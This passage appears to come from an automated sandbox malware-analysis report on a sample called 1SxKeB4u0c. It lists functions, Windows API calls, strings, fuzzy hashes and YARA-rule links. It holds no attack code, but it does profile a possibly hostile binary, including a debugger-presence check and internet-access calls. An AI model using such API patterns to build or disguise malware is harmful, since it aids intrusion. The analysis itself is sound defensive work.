                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                              • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                              • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                              • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                              Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462A22
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                              • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                              • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                              • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                              Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                              • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                              • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                              • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                              Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • _wcscat.LIBCMT ref: 00444CB7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                              • String ID: SL
                                                                              • API String ID: 257928180-181245872
                                                                              • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                              • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                              • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                              • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                              Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                              • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                              • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                              • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                              Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 1988441806-3962188686
                                                                              • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                              • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                              • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                              • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                              Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                              • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                              • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                              • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                              Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                              • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                              • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                              • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                              Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                              • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Init$ClearCopy_memmove
                                                                              • String ID: d}K
                                                                              • API String ID: 2932060187-3405784397
                                                                              • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                              • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                              • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                              • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                              Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                              • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                              • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                              • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                              Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 3158253471-631824599
                                                                              • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                              • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                              • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                              • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9